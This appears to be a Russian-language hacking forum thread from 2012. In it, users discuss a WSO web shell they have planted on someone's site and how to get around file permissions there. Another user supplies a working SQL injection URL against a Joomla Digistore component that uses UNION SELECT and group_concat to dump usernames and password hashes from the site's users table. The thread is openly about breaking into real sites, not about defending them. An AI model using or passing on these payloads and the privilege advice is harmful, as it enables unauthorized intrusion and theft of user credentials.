 |
|
23.04.2012, 19:09
|
|
Участник форума
Регистрация: 08.01.2010
Сообщений: 155
С нами:
8599678
Репутация:
22
|
|
залил wso шелл на сайт. пытаюсь редактировать .htacess, а мне пишет File isn't writeable
права на файл стоят 0644 и они не меняются. скажите, как можно изменить права на файл или как отредактировать файл?
|
|
|
23.04.2012, 19:19
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
Сообщение от skagen
залил wso шелл на сайт. пытаюсь редактировать .htacess, а мне пишет File isn't writeable
права на файл стоят 0644 и они не меняются. скажите, как можно изменить права на файл или как отредактировать файл?
Сменить овнера файла на того, который может выставить нужные права для редактирования файла. Очевидно же. На практике это означает, что нужно повысить свои права, которыx у вас не хватает для вышеперечисленных операций. Ответ на вопрос: "Что тогда делать?" напрашивается сам собой.
|
|
|
|
23.04.2012, 19:20
|
|
Участник форума
Регистрация: 02.07.2010
Сообщений: 140
С нами:
8348726
Репутация:
0
|
|
Сообщение от skagen
залил wso шелл на сайт. пытаюсь редактировать .htacess, а мне пишет File isn't writeable
права на файл стоят 0644 и они не меняются. скажите, как можно изменить права на файл или как отредактировать файл?
Если в папке есть права - удали файл и создай заного
|
|
|
|
23.04.2012, 21:04
|
|
Новичок
Регистрация: 01.04.2011
Сообщений: 13
С нами:
7955606
Репутация:
0
|
|
уязвимость (SQL inj) Joomla в компоненте Digistore
http://www.exploitsdownload.com/exploit/na/joomla-digistore-sql-injection
http://joomla15.ijoomlademo.com/index.php?option=com_digistore&controller=digi storeProducts&task=list&cid[]=-2/**/union/**/select/**/user(),user(),user(),version(),user(),user()
Объясните пожалуйста, при помощи этой уязвимости реально слить хэши и ники из основной БД сайта?
|
|
|
|
23.04.2012, 21:19
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
а в чем проблема?
Код:
http://joomla15.ijoomlademo.com/index.php?option=com_digistore&controller=digistor%20eProducts&task=list&cid[]=-2/**/union/**/select/**/group_concat%28username,0x3a,password%29,2,3,4/**/from/**/j17w2hcpwjzo5__users
|
|
|
|
23.04.2012, 21:30
|
|
Новичок
Регистрация: 01.04.2011
Сообщений: 13
С нами:
7955606
Репутация:
0
|
|
Сообщение от Seravin
а в чем проблема?
Код:
http://joomla15.ijoomlademo.com/index.php?option=com_digistore&controller=digistor%20eProducts&task=list&cid[]=-2/**/union/**/select/**/group_concat%28username,0x3a,password%29,2,3,4/**/from/**/j17w2hcpwjzo5__users
Я бы был невероятно признателен Вам, если бы разъяснили в чём соль. Просто в прошлый раз когда я получал пароли на локалхосте (самописный двиг с детской уязвимостью), все хэши выпадали в ошибку, а тут даже в исходном коде нет намёков. Извините если напрягаю
|
|
|
|
23.04.2012, 21:44
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
как минимум то, что у тебя 6 полей было, а у меня 4
|
|
|
|
23.04.2012, 21:49
|
|
Участник форума
Регистрация: 08.01.2010
Сообщений: 155
С нами:
8599678
Репутация:
22
|
|
Сообщение от Га-Ноцри
Сменить овнера файла на того, который может выставить нужные права для редактирования файла. Очевидно же. На практике это означает, что нужно повысить свои права, которыx у вас не хватает для вышеперечисленных операций. Ответ на вопрос: "Что тогда делать?" напрашивается сам собой.
и каким образом сменить владельца то или повысить свои права?
|
|
|
|
23.04.2012, 22:38
|
|
Новичок
Регистрация: 01.04.2011
Сообщений: 13
С нами:
7955606
Репутация:
0
|
|
Сообщение от Seravin
как минимум то, что у тебя 6 полей было, а у меня 4
ну а дела то в конечном итоге не меняет
|
|
|
|
23.04.2012, 23:57
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от None
ну а дела то в конечном итоге не меняет
как это так «дела не меняет?».
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
